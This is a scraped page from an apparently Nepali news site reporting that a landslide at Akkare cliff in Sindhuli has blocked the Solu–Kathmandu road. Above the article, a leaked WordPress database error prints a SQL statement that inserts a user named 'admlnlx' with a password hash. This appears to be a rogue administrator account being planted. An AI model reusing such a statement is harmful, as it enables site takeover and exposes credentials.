WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BErpdd47CG8hreYtY7Y5wt7AeR9rFV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:27:00', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सिन्धुलीको खुर्कोट घुर्मी सडक खण्डस्थित अक्करे भीरको पहिरोले सोलु–काठमाण्डौँ सडक सञ्चालन ठप्प बनेको छ । सिन्धुलीको गोलञ्जोर गाउँपालिका–६ बाशेश्वरको हैबारस्थित अक्करे भीरमा सधै बग्ने सुख्खा पहिरोले सडक अवरुद्ध हुँदा सवारी सञ्चालन बन्द भएको हो ।
इस्काभेटर र लोडर प्रयोग गसरि सडक विभागले पहिरो हटाउने प्रयास गरेपनि पहिरो नरोकिएकोले सिन्धुलीको पुष्पलाल मध्यपहाडी लोकमार्ग हुँदै यात्रा गर्ने सिन्धुली, उदयपुर, खोटाङ, ओखलढुंगा र सोलुखुम्बुुलगायत जिल्लाका यात्रुहरुले समस्या झेल्दै आएका छन् ।